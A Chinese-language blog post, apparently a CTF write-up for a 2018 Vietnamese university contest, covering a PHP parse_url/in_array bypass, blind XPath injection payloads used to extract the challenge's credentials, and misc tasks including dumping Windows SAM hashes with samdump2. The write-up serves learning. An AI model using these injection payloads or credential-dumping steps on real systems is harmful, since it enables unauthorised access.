<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Hexo, NexT" />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1" />






<meta name="description" content="越南一个大学办的比赛">
<meta name="keywords">
<meta property="og:type" content="article">
<meta property="og:title" content="isitdtuwp">
<meta property="og:url" content="http://Merl1ng.com/2018/07/31/isitdtuwp/index.html">
<meta property="og:site_name" content="Merl1ng's blog">
<meta property="og:description" content="越南一个大学办的比赛">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/78578676.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/7678xml.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/xpath1.PNG">
<meta property="og:image" content="http://otvzfr1o1.bkt.clouddn.com/xpath2.PNG">
<meta property="og:updated_time" content="2018-08-18T10:30:44.105Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="isitdtuwp">
<meta name="twitter:description" content="越南一个大学办的比赛">
<meta name="twitter:image" content="http://otvzfr1o1.bkt.clouddn.com/78578676.PNG">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://Merl1ng.com/2018/07/31/isitdtuwp/"/>





  <title>isitdtuwp | Merl1ng's blog</title>
  














</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Merl1ng's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://Merl1ng.com/2018/07/31/isitdtuwp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Merl1ng">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Merl1ng's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">isitdtuwp</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-07-31T18:43:59+08:00">
                2018-07-31
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>越南一个大学办的比赛</p>
<a id="more"></a>
<h3 id="web-1"><a href="#web-1" class="headerlink" title="web 1"></a>web 1</h3><p>直接有源码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div></pre></td><td class="code"><pre><div class="line">&lt;?php </div><div class="line">include <span class="string">"config.php"</span>; </div><div class="line"><span class="variable">$number1</span> = rand(1,100000000000000); </div><div class="line"><span class="variable">$number2</span> = rand(1,100000000000); </div><div class="line"><span class="variable">$number3</span> = rand(1,100000000); </div><div class="line"><span class="variable">$url</span> = urldecode(<span class="variable">$_SERVER</span>[<span class="string">'REQUEST_URI'</span>]); </div><div class="line"><span class="variable">$url</span> = parse_url(<span class="variable">$url</span>, PHP_URL_QUERY); </div><div class="line"><span class="keyword">if</span> (preg_match(<span class="string">"/_/i"</span>, <span class="variable">$url</span>))  </div><div class="line">&#123; </div><div class="line">    die(<span class="string">"..."</span>); </div><div class="line">&#125; </div><div class="line"><span class="keyword">if</span> (preg_match(<span class="string">"/0/i"</span>, <span class="variable">$url</span>))  </div><div class="line">&#123; </div><div class="line">    die(<span class="string">"..."</span>); </div><div class="line">&#125; </div><div class="line"><span class="keyword">if</span> (preg_match(<span class="string">"/\w+/i"</span>, <span class="variable">$url</span>))  </div><div class="line">&#123; </div><div class="line">    die(<span class="string">"..."</span>); </div><div class="line">&#125;     </div><div class="line"><span class="keyword">if</span>(isset(<span class="variable">$_GET</span>[<span class="string">'_'</span>]) &amp;&amp; !empty(<span class="variable">$_GET</span>[<span class="string">'_'</span>])) </div><div class="line">&#123; </div><div class="line">    <span class="variable">$control</span> = <span class="variable">$_GET</span>[<span class="string">'_'</span>];         </div><div class="line">    <span class="keyword">if</span>(!in_array(<span class="variable">$control</span>, array(0,<span class="variable">$number1</span>))) </div><div class="line">    &#123; </div><div class="line">        die(<span class="string">"fail1"</span>); </div><div class="line">    &#125; </div><div class="line">    <span class="keyword">if</span>(!in_array(<span class="variable">$control</span>, array(0,<span class="variable">$number2</span>))) </div><div class="line">    &#123; </div><div class="line">        die(<span class="string">"fail2"</span>); </div><div class="line">    &#125; </div><div class="line">    <span class="keyword">if</span>(!in_array(<span class="variable">$control</span>, array(0,<span class="variable">$number3</span>))) </div><div class="line">    &#123; </div><div class="line">        die(<span class="string">"fail3"</span>); </div><div class="line">    &#125; </div><div class="line">    <span class="built_in">echo</span> <span class="variable">$flag</span>; </div><div class="line">&#125; </div><div class="line">show_source(__FILE__); </div><div class="line">?&gt;</div></pre></td></tr></table></figure>
<p>php的漏洞 parse_url 和 in_array()</p>
<p>parse_url 之间见过好几次了 ///即可 这题 //也行</p>
<p>in_array() 刚好又看到先知推的红日安全的文章 弱比较 ‘’就过了</p>
<p>其实这题我做的时候///绕完第一处 随手’’就打印出 flag 了。。回去补得原理</p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/78578676.PNG" alt=""></p>
<h3 id="web-2"><a href="#web-2" class="headerlink" title="web 2"></a>web 2</h3><p>见上一篇文章 </p>
<h3 id="web-3"><a href="#web-3" class="headerlink" title="web 3"></a>web 3</h3><p>xpath注入 这玩意还第一次见</p>
<p>思想类似 sql 盲注</p>
<p><a href="https://www.cnblogs.com/bmjoker/p/8861927.html" target="_blank" rel="external">https://www.cnblogs.com/bmjoker/p/8861927.html</a><br><a href="http://www.mottoin.com/95785.html" target="_blank" rel="external">http://www.mottoin.com/95785.html</a></p>
<p>本来应该先获取父结点的名字 然后分别获取  </p>
<p>子结点的名字</p>
<p><code>&#39;or substring(name(//user[1]/*[2]),1,1)=&#39;u&#39; or &#39;a&#39;=&#39;a</code></p>
<p>子结点的值</p>
<p><code>&#39;or substring(//user[1]/*[2],1,1)=&#39;u&#39; or &#39;a&#39;=&#39;a</code><br>或者<br><code>&#39;or substring(//user[1]/*[2]/text(),1,1)=&#39;a&#39; or&#39;a&#39;=&#39;a</code></p>
<p>类似这样 但这题不行</p>
<p><code>&#39;and 1=0] | //*[contains(.,&#39;A&#39;)] | //*[&#39;1&#39;=&#39;0</code> 对</p>
<p><code>&#39;and 1=0] | //*[contains(.,&#39;AD&#39;)] | //*[&#39;1&#39;=&#39;0</code> 错</p>
<p><code>&#39;and 1=0] | //*[contains(.,&#39;Ad&#39;)] | //*[&#39;1&#39;=&#39;0</code> 对</p>
<p>一位一位爆破就行 </p>
<p>最后<br><code>&#39;and 1=0] | //*[contains(.,&#39;Adm1n&#39;)] | //*[&#39;1&#39;=&#39;0</code></p>
<p><code>&#39;and 1=0] | //*[contains(.,&#39;Ez_t0_gu3ss_PaSSw0rd&#39;)] | //*[&#39;1&#39;=&#39;0</code></p>
<p>总共其实有这些 按名字放到用户和密码排列组合一下也就出来了</p>
<p>Adm1n<br>Administrator<br>ColdTick<br>Ez_t0_gu3ss_PaSSw0rd<br>FromD2VNWithLove<br>guest</p>
<p>最后 这题有个巨坑的非预期 扫目录的话可以看见 xml 里面直接写了账号密码。。</p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/7678xml.PNG" alt=""></p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/xpath1.PNG" alt=""></p>
<p><img src="http://otvzfr1o1.bkt.clouddn.com/xpath2.PNG" alt=""></p>
<h3 id="misc-1"><a href="#misc-1" class="headerlink" title="misc 1"></a>misc 1</h3><p>xxd -r -p drill &gt; 500</p>
<p><strong>xxd</strong>命令 学到了</p>
<p>file 500<br>500: Zip archive data</p>
<p>unzip 500<br>Archive:  500<br>error [500]:  missing 4 bytes in zipfile<br>  (attempting to process anyway)<br>error [500]:  attempt to seek before beginning of zipfile<br>  (please check that you have transferred or created the zipfile in the<br>  appropriate BINARY mode and that you have compiled UnZip properly)<br>  (attempting to re-compensate)<br>file #1:  bad zipfile offset (local header sig):  0<br>  (attempting to re-compensate)<br>error [500]:  attempt to seek before beginning of zipfile<br>  (please check that you have transferred or created the zipfile in the<br>  appropriate BINARY mode and that you have compiled UnZip properly)</p>
<p>在前面加上 \x50\x4B\x03\x04</p>
<p>然后成功解压 但还是个压缩包 这次带有密码</p>
<p>暴力破解</p>
<h3 id="misc-2"><a href="#misc-2" class="headerlink" title="misc 2"></a>misc 2</h3><p>file 一下 看起来像  SAM 或者 SYSTEM file</p>
<p>samdump2 -o test.txt 2 1</p>
<p>得到 windows password</p>
<p>samdump2可以破解系统的密码 </p>
<p><a href="https://crackstation.net/" target="_blank" rel="external">https://crackstation.net/</a> 在线解码</p>
<p>考察知识面orz</p>
<h3 id="misc-3"><a href="#misc-3" class="headerlink" title="misc 3"></a>misc 3</h3><p>file 一下 basic_crypto : data</p>
<p>因为名称是 basic_crypto</p>
<p>猜测是xor</p>
<p>xortool -b basic_crypto</p>
<p>得到一张图片 显示 too low</p>
<p>改图片大小 看到下面有东西 </p>
<p>镜像（左右颠倒） ocr提出来 用base32解密</p>
<p><a href="https://geocaching.dennistreysa.de/multisolver/index.html" target="_blank" rel="external">https://geocaching.dennistreysa.de/multisolver/index.html</a></p>
<p>这个解密网站贼牛逼。。</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/07/31/近期一些wp/" rel="next" title="近期一些wp">
                <i class="fa fa-chevron-left"></i> 近期一些wp
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/07/29/利用gopher和ssrf操作内网mysql/" rel="prev" title="利用gopher和ssrf操作内网mysql">
                利用gopher和ssrf操作内网mysql <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            Overview
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.gif"
               alt="Merl1ng" />
          <p class="site-author-name" itemprop="name">Merl1ng</p>
           
              <p class="site-description motion-element" itemprop="description">Love life , love gakki !</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">68</span>
                <span class="site-state-item-name">posts</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">7</span>
                <span class="site-state-item-name">categories</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">24</span>
                <span class="site-state-item-name">tags</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/Merl1ng" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://twitter.com/Merl1ng" target="_blank" title="Twitter">
                  
                    <i class="fa fa-fw fa-twitter"></i>
                  
                  Twitter
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#web-1"><span class="nav-number">1.</span> <span class="nav-text">web 1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web-2"><span class="nav-number">2.</span> <span class="nav-text">web 2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web-3"><span class="nav-number">3.</span> <span class="nav-text">web 3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#misc-1"><span class="nav-number">4.</span> <span class="nav-text">misc 1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#misc-2"><span class="nav-number">5.</span> <span class="nav-text">misc 2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#misc-3"><span class="nav-number">6.</span> <span class="nav-text">misc 3</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Merl1ng</span>
</div>


<div class="powered-by">
   Love life 
</div>

<div class="theme-info">
  Love gakki 
  
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  





  






  





  

  

  

  

  

  

</body>
</html>

<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>